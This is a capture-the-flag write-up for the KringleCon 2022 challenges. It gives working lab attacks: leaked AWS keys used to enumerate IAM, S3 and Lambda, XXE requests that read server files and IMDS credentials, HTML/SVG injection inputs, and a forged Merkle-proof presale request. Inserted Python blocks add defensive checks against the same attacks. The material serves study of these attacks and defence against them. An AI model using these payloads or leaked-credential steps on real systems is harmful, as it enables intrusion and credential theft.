
^C2022/12/12 05:51:46 [updater parent] prog returned error: signal: interrupt
elf@dd1ea5c9dd6e:~/test$ 

https://haugfactory.com/orcadmin/aws_scripts/-/blob/106d33e1ffd53eea753c1365eafc6588398279b5/put_policy.py

iam = boto3.client('iam',
    region_name='us-east-1',
    aws_access_key_id="AKIAAIDAYRANYAHGQOHD",
    aws_secret_access_key="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",
)

elf@dd1ea5c9dd6e:~/test$ aws configure
AWS Access Key ID [None]: AKIAAIDAYRANYAHGQOHD
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]: aws sts get-caller-identity
elf@dd1ea5c9dd6e:~/test$ aws configure
AWS Access Key ID [****************QOHD]: 
AWS Secret Access Key [****************c1rL]: 
Default region name [us-east-1]: 
Default output format [aws sts get-caller-identity]: None
elf@dd1ea5c9dd6e:~/test$ aws sts get-caller-identity
{
    "UserId": "AIDAJNIAAQYHIAAHDDRA",
    "Account": "602123424321",
    "Arn": "arn:aws:iam::602123424321:user/haug"
}
elf@dd1ea5c9dd6e:~/test$ 
  2. Managed (think: shared) policies can be attached to multiple users. Use the AWS CLI to find any policies attached to your user. The aws iam command to list attached user policies can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html Hint: it is NOT list-user-policies.
elf@dd1ea5c9dd6e:~/test$ aws iam list-attached-user-policies --user-name haug
{
    "AttachedPolicies": [
        {
            "PolicyName": "TIER1_READONLY_POLICY",
            "PolicyArn": "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY"
        }
    ],
    "IsTruncated": false
}
  3. Now, view or get the policy that is attached to your user. The aws iam command to get a policy can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
elf@dd1ea5c9dd6e:~/test$ aws iam get-policy --policy-arn arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY
{
    "Policy": {
        "PolicyName": "TIER1_READONLY_POLICY",
        "PolicyId": "ANPAYYOROBUERT7TGKUHA",
        "Arn": "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY",
        "Path": "/",
        "DefaultVersionId": "v1",
        "AttachmentCount": 11,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "Description": "Policy for tier 1 accounts to have limited read only access to certain resources in IAM, S3, and LAMBDA.",
        "CreateDate": "2022-06-21 22:02:30+00:00",
        "UpdateDate": "2022-06-21 22:10:29+00:00",
        "Tags": []
    }
}
  4. Attached policies can have multiple versions. View the default version of this policy. The aws iam command to get a policy version can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
elf@dd1ea5c9dd6e:~/test$ aws iam get-policy-version --version-id v1 --policy-arn arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY

───────────────────────────────────────────────────────────────────────────────────────────────
                        "iam:ListUserPolicies",
                        "iam:ListAttachedUserPolicies"
                    ],
                    "Resource": "arn:aws:iam::602123424321:user/${aws:username}"
                },
                {
                    "Effect": "Allow",
                    "Action": [
                        "iam:GetPolicy",
                        "iam:GetPolicyVersion"
                    ],
                    "Resource": "arn:aws:iam::602123424321:policy/TIER1_READONLY_POLICY"
                },
                {
                    "Effect": "Deny",
                    "Principal": "*",
                    "Action": [
                        "s3:GetObject",
                        "lambda:Invoke*"
                    ],
                    "Resource": "*"
                }
            ]
        },
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2022-06-21 22:02:30+00:00"
    }
}
elf@dd1ea5c9dd6e:~/test$ 
  5. Inline policies are policies that are unique to a particular identity or resource. Use the AWS CLI to list the inline policies associated with your user. The aws iam command to list user policies can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html Hint: it is NOT list-attached-user-policies.
elf@dd1ea5c9dd6e:~/test$ aws iam list-user-policies --user-name haug
{
    "PolicyNames": [
        "S3Perms"
    ],
    "IsTruncated": false
}
elf@dd1ea5c9dd6e:~/test$ 
  6. Now, use the AWS CLI to get the only inline policy for your user. The aws iam command to get a user policy can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/index.html
elf@dd1ea5c9dd6e:~/test$ aws iam get-user-policy --user-name haug --policy-name S3Perms 
    "UserPolicy": {
        "UserName": "haug",
        "PolicyName": "S3Perms",
        "PolicyDocument": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Effect": "Allow",
                    "Action": [
                        "s3:ListObjects"
                    ],
                    "Resource": [
                        "arn:aws:s3:::smogmachines3",
                        "arn:aws:s3:::smogmachines3/*"
                    ]
                }
            ]
        }
    },
    "IsTruncated": false
}
elf@dd1ea5c9dd6e:~/test$ 
  7. The inline user policy named S3Perms disclosed the name of an S3 bucket that you have permissions to list objects in. List those objects! The aws s3api command to list objects in an S3 bucket can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/index.html
elf@dd1ea5c9dd6e:~/test$ aws s3api list-objects --bucket "smogmachines3"
        },
        {
            "Key": "smog-power-station.jpg",
            "LastModified": "2022-09-23 20:40:46+00:00",
            "ETag": "\"0e69b8d53d97db0db9f7de8663e9ec09\"",
            "Size": 32498,
            "StorageClass": "STANDARD",
            "Owner": {
                "DisplayName": "grinchum",
                "ID": "15f613452977255d09767b50ac4859adbb2883cd699efbabf12838fce47c5e60"
            }
        },
        {
            "Key": "smogmachine_lambda_handler_qyJZcqvKOthRMgVrAJqq.py",
            "LastModified": "2022-09-26 16:31:33+00:00",
            "ETag": "\"fd5d6ab630691dfe56a3fc2fcfb68763\"",
            "Size": 5823,
            "StorageClass": "STANDARD",
            "Owner": {
                "DisplayName": "grinchum",
                "ID": "15f613452977255d09767b50ac4859adbb2883cd699efbabf12838fce47c5e60"
            }
        }
    ],
    "Name": "smogmachines3",
    "Prefix": "",
    "MaxKeys": 1000,
    "EncodingType": "url"
}
elf@dd1ea5c9dd6e:~/test$ 

8. The attached user policy provided you several Lambda privileges. Use the AWS CLI to list Lambda functions. The aws lambda command to list functions can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/index.html

elf@dd1ea5c9dd6e:~/test$ aws lambda list-functions
elf@dd1ea5c9dd6e:~/test$ aws lambda list-functions|head
{
    "Functions": [
        {
            "FunctionName": "smogmachine_lambda",
            "FunctionArn": "arn:aws:lambda:us-east-1:602123424321:function:smogmachine_lambda",
            "Runtime": "python3.9",
            "Role": "arn:aws:iam::602123424321:role/smogmachine_lambda",
            "Handler": "handler.lambda_handler",
            "CodeSize": 2126,
            "Description": "",
elf@dd1ea5c9dd6e:~/test$ 
                "VpcId": "vpc-85ea8596648f35e00"
            },
            "Environment": {
                "Variables": {
                    "LAMBDASECRET": "975ceab170d61c75",
                    "LOCALMNTPOINT": "/mnt/smogmachine_files"
                }
            },
            "TracingConfig": {
                "Mode": "PassThrough"
            },
            "RevisionId": "7e198c3c-d4ea-48dd-9370-e5238e9ce06e",
            "FileSystemConfigs": [
                {
                    "Arn": "arn:aws:elasticfilesystem:us-east-1:602123424321:access-point/fsap-db3277b03c6e975d2",
                    "LocalMountPath": "/mnt/smogmachine_files"
                }
            ],
            "PackageType": "Zip",
            "Architectures": [
                "x86_64"
            ],
            "EphemeralStorage": {
                "Size": 512
            }
        }
    ]
}
elf@dd1ea5c9dd6e:~/test$ 

9. Lambda functions can have public URLs from which they are directly accessible. Use the AWS CLI to get the configuration containing the public URL of the Lambda function. The aws lambda command to get the function URL config can be found here: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/index.html

elf@dd1ea5c9dd6e:~/test$ aws lambda get-function-url-config --function-name smogmachine_lambda
{
    "FunctionUrl": "https://rxgnav37qmvqxtaksslw5vwwjm0suhwc.lambda-url.us-east-1.on.aws/",
    "FunctionArn": "arn:aws:lambda:us-east-1:602123424321:function:smogmachine_lambda",
    "AuthType": "AWS_IAM",
    "Cors": {
        "AllowCredentials": false,
        "AllowHeaders": [],
        "AllowMethods": [
            "GET",
            "POST"
        ],
        "AllowOrigins": [
            "*"
        ],
        "ExposeHeaders": [],
        "MaxAge": 0
    },
    "CreationTime": "2022-09-07T19:28:23.808713Z",
    "LastModifiedTime": "2022-09-07T19:28:23.808713Z"
}
elf@dd1ea5c9dd6e:~/test$ 
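As an added example (not part of the challenge terminal or its code), a small Python check that reads list-functions and get-function-url-config output like the two above and flags what a reviewer would note: a plaintext secret such as LAMBDASECRET in the environment, an unauthenticated function URL, and wildcard CORS. The sample JSON is constructed with placeholder account id, secret and URL.

```python
import json
import re

# Constructed sample modelled on the list-functions and get-function-url-config
# output above; account id, secret and URL are placeholders, not the challenge's.
FUNCTIONS_JSON = """{"Functions": [{
  "FunctionName": "smogmachine_lambda",
  "Role": "arn:aws:iam::123456789012:role/smogmachine_lambda",
  "Environment": {"Variables": {"LAMBDASECRET": "0000deadbeef0000",
                                "LOCALMNTPOINT": "/mnt/smogmachine_files"}}
}]}"""
URL_CONFIG_JSON = """{"FunctionUrl": "https://example.lambda-url.us-east-1.on.aws/",
  "AuthType": "AWS_IAM",
  "Cors": {"AllowCredentials": false, "AllowOrigins": ["*"],
           "AllowMethods": ["GET", "POST"]}}"""

# Variable names that usually hold material belonging in Secrets Manager or
# SSM Parameter Store rather than in plaintext function configuration.
SECRET_NAME_RE = re.compile(r"secret|token|passw|key|cred", re.IGNORECASE)


def audit_function(func, url_cfg):
    """Return the findings for one function; url_cfg may be None (no URL)."""
    findings = []
    env = func.get("Environment", {}).get("Variables", {})
    for name in env:
        if SECRET_NAME_RE.search(name):
            findings.append("plaintext secret in env var " + name)
    if url_cfg:
        # AuthType NONE exposes the function to the whole internet; AWS_IAM
        # (as in the output above) still requires a SigV4-signed request.
        if url_cfg.get("AuthType") == "NONE":
            findings.append("function URL is unauthenticated (AuthType NONE)")
        cors = url_cfg.get("Cors") or {}
        if "*" in cors.get("AllowOrigins", []):
            findings.append("CORS allows any origin")
    return findings


def audit(functions_json, url_configs):
    """Map FunctionName -> findings; url_configs maps name -> URL config JSON."""
    report = {}
    for func in json.loads(functions_json)["Functions"]:
        name = func["FunctionName"]
        cfg = url_configs.get(name)
        report[name] = audit_function(func, json.loads(cfg) if cfg else None)
    return report


if __name__ == "__main__":
    print(audit(FUNCTIONS_JSON, {"smogmachine_lambda": URL_CONFIG_JSON}))
```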

Web Ring

Naughty IP

From the hint, Wireshark > Statistics > Conversations (sort by most bytes first), 18.222.86.32 has the most requests and seems suspicious.

Credential Mining

The first attack is a brute force login. What’s the first username tried?

Apply filter ip.src == 18.222.86.32 and http and http.request.method == POST and sort by requests. The smallest packet number is 7279, and the username/password are “alice/philip”.

404 FTW

The next attack is forced browsing where the naughty one is guessing URLs. What’s the first successful URL path in this attack?

First apply the filter ip.src == 18.222.86.32 and http and http.request.method == GET to see where the forced browsing starts; the first instance is a request for http://www.toteslegit.us/0 at frame 24475.

Then modify the filter so that it shows successful responses (200) sent to 18.222.86.32 at or after that frame: ip.dst == 18.222.86.32 and http and http.response.code == 200 and frame.number >= 24475. The result is /proc.

IMDS, XXE and Other Abbreviations

The last step in this attack was to use XXE to get secret keys from the IMDS service. What URL did the attacker force the server to fetch?

From the hint (https://www.sans.org/blog/cloud-instance-metadata-services-imds-/), IMDS listens on 169.254.169.254, so we want to find where the victim server (10.12.42.16) receives a successful response from IMDS whose text includes credentials. Applying the filter ip.src_host == 169.254.169.254 and http.response.code == 200 brings back four records. Reading the HTTP response text, only frame number 32925 contains credentials, and the URL is http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance.
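The same two patterns seen in Wireshark above (login brute force, then forced browsing ending in a 200) can be picked out of the web server's own access log. This is an added Python detector, not part of the write-up or the challenge artifacts; the log lines are constructed, and the /login.html path and the 401/404 statuses are assumptions, while the attacker IP, the /0 probe and /proc come from the text above.

```python
import re
from collections import Counter, defaultdict

# Common Log Format: client IP, timestamp, request line and status are enough here.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed access-log lines modelled on the attack above: the attacker IP,
# the /0 probe and /proc come from the write-up; everything else is made up.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2022:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512
18.222.86.32 - - [10/Oct/2022:10:00:01 +0000] "POST /login.html HTTP/1.1" 401 89
18.222.86.32 - - [10/Oct/2022:10:00:02 +0000] "POST /login.html HTTP/1.1" 401 89
18.222.86.32 - - [10/Oct/2022:10:00:03 +0000] "POST /login.html HTTP/1.1" 401 89
18.222.86.32 - - [10/Oct/2022:10:00:04 +0000] "GET /0 HTTP/1.1" 404 0
18.222.86.32 - - [10/Oct/2022:10:00:05 +0000] "GET /admin HTTP/1.1" 404 0
18.222.86.32 - - [10/Oct/2022:10:00:06 +0000] "GET /proc HTTP/1.1" 200 1200
10.0.0.7 - - [10/Oct/2022:10:00:07 +0000] "GET /missing HTTP/1.1" 404 0
"""


def parse(log):
    """Yield (ip, method, path, status) for every well-formed line."""
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3), int(m.group(4))


def login_bruteforce(log, login_path="/login.html", threshold=3):
    """IPs that POST to the login page at least `threshold` times."""
    counts = Counter(ip for ip, method, path, _ in parse(log)
                     if method == "POST" and path == login_path)
    return {ip: n for ip, n in counts.items() if n >= threshold}


def forced_browsing(log, min_404=2):
    """Per IP, the first path that returned 200 after at least min_404 GET 404s.

    Ordinary clients rarely chain several 404s; a 200 right after such a run is
    the guessed path that worked (/proc in the write-up).
    """
    misses = defaultdict(int)
    first_hit = {}
    for ip, method, path, status in parse(log):
        if method != "GET":
            continue
        if status == 404:
            misses[ip] += 1
        elif status == 200 and misses[ip] >= min_404 and ip not in first_hit:
            first_hit[ip] = path
    return first_hit
```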

Open Boria Mine Door

Just use Burp to send each of these as inputTxt to the web app.

POST /pin1 HTTP/2
Host: hhc22-novel.kringlecon.com

inputTxt=@&@&&W&&W&&&&

<!-- TODO: FILTER OUT HTML FROM USER INPUT -->

POST /pin2 HTTP/2
Host: hhc22-novel.kringlecon.com

inputTxt=<html><body style="background-color:white;"></html>

POST /pin3 HTTP/2
Host: hhc22-novel.kringlecon.com

inputTxt=<html><body onload="document.body.style.backgroundColor = blue;"></html>
<svg version="1.1" width="100%" height="100%">
  <rect fill="#0000FF" width="100%" height="100%"/>
</svg>

/pin4
<svg version=1.1 width="100%" height="500">
  <line width="100%" height="100%" x1="0" y1="45" x2="200" y2="45" stroke="white" stroke-width="15"/>
  <line width="100%" height="100%" x1="0" y1="135" x2="200" y2="135" stroke="blue" stroke-width="15"/>
</svg>

/pin5
<svg version=1.1 width="100%" height="500">
  <line width="100%" height="100%" x1="0" y1="135" x2="200" y2="45" stroke="red" stroke-width="15"/>
  <line width="100%" height="100%" x1="0" y1="200" x2="200" y2="85" stroke="blue" stroke-width="15"/>
</svg>

/pin6
<svg version=1.1 width="100%" height="500">
  <line width="100%" height="100%" x1="0" y1="30" x2="200" y2="30" stroke="#00ff00" stroke-width="15"/>
  <line width="100%" height="100%" x1="0" y1="75" x2="200" y2="110" stroke="red" stroke-width="15"/>
  <line width="100%" height="100%" x1="0" y1="115" x2="200" y2="200" stroke="blue" stroke-width="15"/>
</svg>

Glamtariel’s Fountain

POST /dropped HTTP/2
Host: glamtarielsfountain.com
Cookie: MiniLembanh=e647091d-8815-46a1-8524-62d32abaff6f.4R_HY7-t_k7Yfmj7-Uy8PGE2v7E; GCLB="87ef1373d0f1cf3a"
Content-Length: 206
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/xml
Content-Type: application/xml
X-Grinchum: ImVlNzQwMWMzODI4ZGRjNjc5YTVkYTg4ZDMwMzkxN2ZhM2I5YmM1MmQi.Y7pz8A.mxVn4ZZIfH3mTy_q3wGOuDASSRo
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://glamtarielsfountain.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://glamtarielsfountain.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///app/static/images/ringlist.txt"> ]>
<root>
  <imgDrop>&ent;</imgDrop>
  <who>princess</who>
  <reqType>xml</reqType>
</root>

{
  "appResp": "Ah, you found my ring list! Gold, red, blue - so many colors! Glad I don't keep any secrets in it any more! Please though, don't tell anyone about this.^She really does try to keep things safe. Best just to put it away. (click)",
  "droppedOn": "none",
  "visit": "static/images/pholder-morethantopsupersecret63842.png,262px,100px"
}

ringlist.txt reveals the /x_phial_pholder_2022/ folder (see redring.txt and bluering.txt there, then try silverring.txt). The hint for the next file came from the defiled red ring.

POST /dropped HTTP/2
Host: glamtarielsfountain.com
Cookie: GCLB="efc0d6e10858cbd4"; MiniLembanh=f6b0f2c0-875e-4792-a308-f606d81ba812.MVOtULSE3IvNpyJUfSpqn2U3p5M
Content-Length: 230
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: application/xml
X-Grinchum: ImM2NjcwZWJmMTRkNmExODY2ZGEyZGUzM2FiMWFiMjI2ZTJkZDkyZDgi.Y7sArg.nUhUyjErFQlJWtGa7f1_Y9AN4Ao
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://glamtarielsfountain.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://glamtarielsfountain.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt"> ]>
<root>
  <imgDrop>&ent;</imgDrop>
  <who>princess</who>
  <reqType>xml</reqType>
</root>

response:
{
  "appResp": "Hmmm, and I thought you wanted me to take a look at that pretty silver ring, but instead, you've made a pretty bold REQuest. That's ok, but even if I knew anything about such things, I'd only use a secret TYPE of tongue to discuss them.^She's definitely hiding something.",
  "droppedOn": "none",
  "visit": "none"
}
I was pretty much stuck here... had to ask for help in the Discord because I couldn't understand what to do next... after some helpful hints (REQ TYPE) I tried something that worked.

POST /dropped HTTP/2
Host: glamtarielsfountain.com
Cookie: GCLB="efc0d6e10858cbd4"; MiniLembanh=f6b0f2c0-875e-4792-a308-f606d81ba812.MVOtULSE3IvNpyJUfSpqn2U3p5M
Content-Length: 230
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: application/xml
X-Grinchum: ImM2NjcwZWJmMTRkNmExODY2ZGEyZGUzM2FiMWFiMjI2ZTJkZDkyZDgi.Y7sArg.nUhUyjErFQlJWtGa7f1_Y9AN4Ao
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://glamtarielsfountain.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://glamtarielsfountain.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt"> ]>
<root>
  <imgDrop>img1</imgDrop>
  <who>princess</who>
  <reqType>&ent;</reqType>
</root>
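The requests above work because the server resolves external entities placed in any field, imgDrop first and then reqType. As an added, defender-side example (the fountain's own code is not on the page), here is a Python handler for the /dropped body that refuses any document carrying a DTD and checks every field against an allowlist, so both payloads are rejected before parsing. The sample bodies are constructed; img1 and "princess" appear on the page, while the other ALLOWED_IMG members and the json request type are assumptions.

```python
import xml.etree.ElementTree as ET

# Allowlists for the three fields the /dropped endpoint uses. img1 and "princess"
# appear on the page; the other members are assumed placeholders.
ALLOWED_IMG = {"img1", "img2", "img3", "img4"}
ALLOWED_WHO = {"princess"}
ALLOWED_REQTYPE = {"xml", "json"}

# Constructed request bodies: a benign one, and the page's last payload, where
# the external entity sits in reqType rather than imgDrop.
BENIGN = (b'<?xml version="1.0" ?><root><imgDrop>img1</imgDrop>'
          b'<who>princess</who><reqType>xml</reqType></root>')
XXE = (b'<?xml version="1.0" ?><!DOCTYPE replace [<!ENTITY ent SYSTEM '
       b'"file:///app/static/images/ringlist.txt"> ]>'
       b'<root><imgDrop>img1</imgDrop><who>princess</who><reqType>&ent;</reqType></root>')


class BadRequest(ValueError):
    pass


def parse_drop_request(body):
    """Parse a /dropped body, refusing DTDs and any value outside the allowlists."""
    # No legitimate request carries a DTD, so refuse one before any parser sees
    # it: with no DOCTYPE there is nothing in which an entity could be declared.
    lowered = body.lower()
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        raise BadRequest("DTD or entity declarations are not accepted")
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        raise BadRequest("malformed XML: %s" % exc) from None
    if root.tag != "root":
        raise BadRequest("unexpected root element")
    fields = {}
    checks = (("imgDrop", ALLOWED_IMG), ("who", ALLOWED_WHO), ("reqType", ALLOWED_REQTYPE))
    for tag, allowed in checks:
        node = root.find(tag)
        value = (node.text or "").strip() if node is not None else ""
        # Every field is checked, not just imgDrop: the page's final payload
        # moved the entity into reqType.
        if value not in allowed:
            raise BadRequest(tag + " value not permitted")
        fields[tag] = value
    return fields


def is_accepted(body):
    """True when the body passes parse_drop_request, False otherwise."""
    try:
        parse_drop_request(body)
        return True
    except BadRequest:
        return False
```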

Blockchain Divination

Go to block #1

Transaction 0 This transaction creates a contract. “KringleCoin” Contract Address: 0xc27A2D3DE339Ce353c0eFBa32e948a88F1C86554

Exploit Smart Contract

Here's all you gotta do to pre-purchase your Sporc:

The presale price for a Sporc is 100 KringleCoin (KC). Yeah, we know that's crazy cheap, but we take care of our buds. When we open sales to the public, these things are gonna shoot to the moon.
First, you're gonna want to make sure that your wallet address is on the approved list. Just make sure to leave the "Validate only" box checked, fill in the form, and we'll let you know if you're good-to-go. Before you do anything else, it's always good to be sure you're doing everything right and your address is validated as being on the list (it's actually something called a Merkle Tree... very high-techy-techy stuff).
To check if you're on the list, enter your wallet address and the string of proof values that we gave you when we told you that you were on the pre-approved list. Those values should be hex strings (i.e. start with "0x" and consist of a bunch of values that are 0-9 or "a," "b," "c," "d," "e," or "f"). If you're confused, give us a shout and we can help.
If you're not on the presale list, you're not on the list. Don't beg and plead with us to put you on the list. Seriously - we've only put Sporcs that we're tight with on the list. WE decided who's on the list (COOL SPORCS ONLY). We don't just let anyone on. If we were putting you on the list, we would've contacted you... not the other way around.
Once you've confirmed everything works and you're sure you have the whole validated-and-on-the-list thing down, just go find a KTM and pre-approve a 100 KC transaction from the wallet you validated. That way, the funds are ready to go. Our Wallet Address is 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a.
Once you've pre-approved the payment, come back here and do the same thing you did when you validated your address, just uncheck the "Validate Only" thing. Then, we'll grab your K'Coin, mint a brand spankin' new Sporc, and fire it into your wallet. Zap! Just like that, you'll be the owner of an amazing piece of the digital domain and a member of the Bored Sporc Rowboat Society for life! (Or, until you decide to cash-out and sell your Bored Sporc).

tl;dr: use the script in the repo, add your key and the other required values, alter the script to put your key in the array, and execute it.

request

POST /cgi-bin/presale HTTP/2
Host: boredsporcrowboatsociety.com
Cookie: GCLB="20bc124b2ffafbba"
Content-Length: 416
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: https://boredsporcrowboatsociety.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://boredsporcrowboatsociety.com/presale.html?&challenge=bsrs
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9


{"WalletID":"0xF44D208f9AB692E8f7b4c284cxxxxx","Root":"0x591aa07ea28433368fbeff2bxxxxx","Proof":"0x2ab0a4443bbea3fbe4d0e1503d11ff1367842fb0c8b28a5c85xxxx,0xe53833745f812dbbffd118a573b4b380aae6b82afd4839d67dd7a2f8xxx,0xab642276d45d87c4c538fea27c78e9fae2b6f5d3505d3f108d480xxx","Validate":"false","Session":"f66dcca9-fb1d-4eb0-b36b-439232cc60e2"}

response

HTTP/2 200 OK
Server: nginx/1.23.2
Date: Mon, 09 Jan 2023 08:26:18 GMT
Content-Type: application/json
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

{"Response": "Success! You are now the proud owner of BSRS Token #000712. You can find more information at https://boredsporcrowboatsociety.com/TOKENS/BSRS712, or check it out in the gallery!<br>Transaction: 0xb7a84fccc69d212800f796f187d29424e1e367cd4580c735cxxxx, Block: 109839<br><br>Remember: Just like we planned, tell everyone you know to <u><em>BUY A BoredSporc</em></u>.<br>When general sales start, and the humans start buying them up, the prices will skyrocket, and we all sell at once!<br><br>The market will tank, but we'll all be rich!!!"}

voilà:

https://boredsporcrowboatsociety.com/TOKENS/TOKENIMAGES/BSRS712.png
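The request above sends "Root" alongside "Proof", and the presale goes through because the server verifies the proof against whatever root the client supplies. As an added example (not the site's or the challenge repo's code), here is a Merkle allowlist in Python with the check written both ways: trusting the client's root, and comparing against the root held server-side. The wallets are constructed, and sha256 stands in for the contract's hash function, which the page does not state.

```python
import hashlib

def h(data):
    # hashlib has no keccak256, so this illustration uses sha256; the page does
    # not state which hash the contract uses (assumption).
    return hashlib.sha256(data).digest()

def leaf_hash(wallet):
    return h(bytes.fromhex(wallet[2:]))

def pair_hash(a, b):
    # Sorted-pair hashing (OpenZeppelin MerkleProof style): a proof is just the
    # sibling hashes bottom-up, with no left/right flags.
    return h(a + b) if a <= b else h(b + a)

def build_tree(wallets):
    """Return (root, {wallet: proof}) for an allowlist of wallet addresses."""
    level = [leaf_hash(w) for w in wallets]
    pos = {w: i for i, w in enumerate(wallets)}
    proofs = {w: [] for w in wallets}
    while len(level) > 1:
        if len(level) % 2:
            level.append(level[-1])  # pad an odd level with a duplicate
        for w in wallets:
            proofs[w].append(level[pos[w] ^ 1])
            pos[w] //= 2
        level = [pair_hash(level[i], level[i + 1]) for i in range(0, len(level), 2)]
    return level[0], proofs

def verify_proof(wallet, proof, root):
    node = leaf_hash(wallet)
    for sibling in proof:
        node = pair_hash(node, sibling)
    return node == root

def presale_check_weak(wallet, proof, client_root, trusted_root):
    # The flaw this page exploits: the Root field from the request is trusted.
    return verify_proof(wallet, proof, client_root)

def presale_check_fixed(wallet, proof, client_root, trusted_root):
    # The client-supplied Root is ignored; only the root held server-side counts.
    return verify_proof(wallet, proof, trusted_root)

# Constructed allowlist and an address that is not on it.
APPROVED = ["0x" + "11" * 20, "0x" + "22" * 20, "0x" + "33" * 20]
OUTSIDER = "0x" + "aa" * 20
TRUSTED_ROOT, APPROVED_PROOFS = build_tree(APPROVED)

def demo():
    # Someone off the list builds a tree that includes their own address and
    # submits its root with a matching proof: (weak, fixed) == (True, False).
    own_root, own_proofs = build_tree(APPROVED + [OUTSIDER])
    args = (OUTSIDER, own_proofs[OUTSIDER], own_root, TRUSTED_ROOT)
    return presale_check_weak(*args), presale_check_fixed(*args)
```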